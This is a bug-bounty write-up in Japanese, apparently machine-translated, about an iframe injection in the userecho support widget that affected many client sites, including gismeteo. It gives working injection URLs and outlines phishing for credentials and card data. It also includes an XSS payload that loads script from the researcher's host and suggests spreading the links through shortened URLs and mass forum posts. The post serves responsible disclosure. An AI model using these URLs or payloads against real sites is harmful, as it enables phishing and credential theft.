20,000以上のサイトでのiframeインジェクションとself xss alexarank UA / RU

私は、PrivatBankのバグ報奨金の最初の場所であるsecurityrise.comの独立したセキュリティ研究者です。



私はalexarankのトップに行くことに決め、gismeteo.ua（20位）の脆弱性を探し始めました。 ロシア語版（ www.gismeteo.ru/soft/ ）へのリダイレクトがあり、テクニカルサポートに注意を引きました。



技術サポートはgismeteo.userecho.comにあり、iframeのgismeteoにロードされました。

https://gismeteo.userecho.com/s/interframe.html?url=https://gismeteo.userecho.com/widget/forum/6-/?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https://www.gismeteo.ru&xdm_c=default4178&xdm_p=1
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

その後、チケットを作成するためのフォームが表示されました。



サイトをiframe https://gismeteo.userecho.com/s/interframe.html?url=https://securityz.netに読み込もうとしましたが、読み込めませんでした。 次に、ロードされたサイトのURLに加えて、変数lang、referer、xdm_eなども必要であることに気付きました。

 http://support.gismeteo.ru/s/interframe.html?url=https://securityz.net/?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https://www.gismeteo.ru&xdm_c=default4178&xdm_p=1
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

そして、私のサイトはフレームにロードされました。



ビデオ：





userecho.comウィジェットの所有者は、テクニカルサポートのためにすべてのクライアントサイトで同じAPIを使用しているため、すべてのクライアントがiframeインジェクションに対して脆弱であるという結論に達しました。



トップクライアントのリスト（ http://userecho.com/clients/?lang=en）を見つけ、多くの脆弱なクライアントが最も訪問されたサイトであることを理解しています。



-drugvokrug.ru（ソーシャルネットワーク、5,000,000人以上のユーザー）、

-fl.ru（ロシアで最も人気のあるフリーランス交換）

-easypay.ua（ウクライナで最も訪問された支払いシステムの1つ）

-tankionline.com

-ivi.ru

-amiro.ru

-okko.tv

-insales.ru

-a-lab.ru

-scrapinghub.com

-iridiummobile.netおよびその他多数。



ほとんどすべてのサイトは、たとえばask.drugvokrug.ruなどのサブドメインでuserechoウィジェットをホストしますが、userecho kontur.userecho.comでサブドメインとしてホストするサイトもあります。 google / yandex dorksでuserechoクライアントを検索することもできます。



攻撃ベクトル：

• 1.フィッシング-サイトをアップロードします。その中の1つは元のサイトと同じサイトにアップロードされ、元のサイトと区別できません。被害者はデータを入力し、私のところに来ます！ （ログイン、パスワード、クレジットカード番号、cvv2-easypay.uaなど）。
  
  
  
  例： http : //securityz.net/gismeteo.html?lang = en&referer = https : //www.gismeteo.ru/soft/&xdm_e=https : //www.gismeteo.ru&xdm_c=default4178&xdm_p=1-サイトのコピーを作成しましたgismeteoで、ユーザーがgismeteoでユーザー名とパスワードを入力すると、私のところに来ます。
  
  
  
  
• 2. iframe Webサイトへの広告の導入。脆弱なサイトの広告として偽装される可能性があります。
  
  
  
  例： http : //support.gismeteo.ru/s/interframe.html?url=https : //securityz.net/?lang=en&referer=https : //www.gismeteo.ru/soft/&xdm_e=https :/ /www.gismeteo.ru&xdm_c=default4178&xdm_p=1
  
  
  
  
• 3.脆弱なサイトでの悪意のあるコードの実行。 もちろん、脆弱なサイトでjavascriptを実行できますが、ドメインのコンテキストでは実行できません（私のサイトでアラートを出します）：
  
  
  
  

   <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> "><script src=https://securityz.net/t.js?319304></script></script>
        
        
  
          
          
          
        
  
      
          
          
          
        
        
  
          
          
          
        
  
      
       / SVG + XML、BASE64、PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI + YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg =="タイプ= "画像/ SVG + XML"のAllowScriptAccess = "常に"> </ EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> "><script src=https://securityz.net/t.js?319304></script></script>
        
        
  
          
          
          
        
  
      
          
          
          
        
        
  
          
          
          
        
  
      
       

  
  
  

悪意のあるリンクを拡散するには、最初にgoo.gl/GIYRURリンクを短くする必要があります。次に：

1. メールアドレスでフォーラムに大量に送信します。
2. この脆弱性を使用して、特定のユーザーまたは管理者を標的に攻撃します。

脆弱なメッセージを脆弱な各サイトに送信することは可能ですが、脆弱性はuserecho開発者によって迅速に修正され、脆弱なサイトまたはウィジェット開発者からは何も取得できませんでした。



そのため、私はすぐにプラグイン開発者に発見を知らせることにしました。



2017年1月9日23:00：バグレポートがuserecho.comをサポートしている人に送信されました。



2017年1月10日00:10：脆弱性が修正され、脆弱なinterframe.htmlファイルが削除されました（開発者からのコメント-interframe.htmlファイルは使用できなくなり（削除）、すべてのウィジェットはそれなしで動作します。したがって、すべて同じAPIで動作します）。



2017年1月10日02時14分：開発者は100ドルの報酬を支払いました。 コメント：

あなたは私たちがそのような大企業ではないことを理解する必要があります。 さらに、これは一般に、誰かに金銭的な報酬を与えることを決定したのは初めてです。

また、userechoサポートにSELF XSSの脆弱性を発見しましたが、修正する予定はありません。脆弱性は2万を超えるサイトの影響を受けます。 記事とPoCをご覧ください 。



iframeインジェクションを排除するように開発者を説得しました。

あなたがinterframe.htmlで遊んだことをログから見て、原則として、それがなぜ使われたかを理解しました。 それを利益とともにどのように使用するかのオプションのみが明確ではありませんでした。



ユースケースを理解し、修正を求められたので 、 100USDをお客様に転送する準備ができました。

+このウィジェットに別のxss脆弱性が見つかりました。誰も修正しません



彼女はまだ20,000以上のサイトにいます。



すべての最新の出版物に遅れないようにするには、Twitter https://twitter.com/qiecew9wとvkを購読してください 。 購読することを非常に嬉しく思います。）

頑張って！

次の記事[BugBounty]部分認証バイパスvk.comを読むことをお勧めします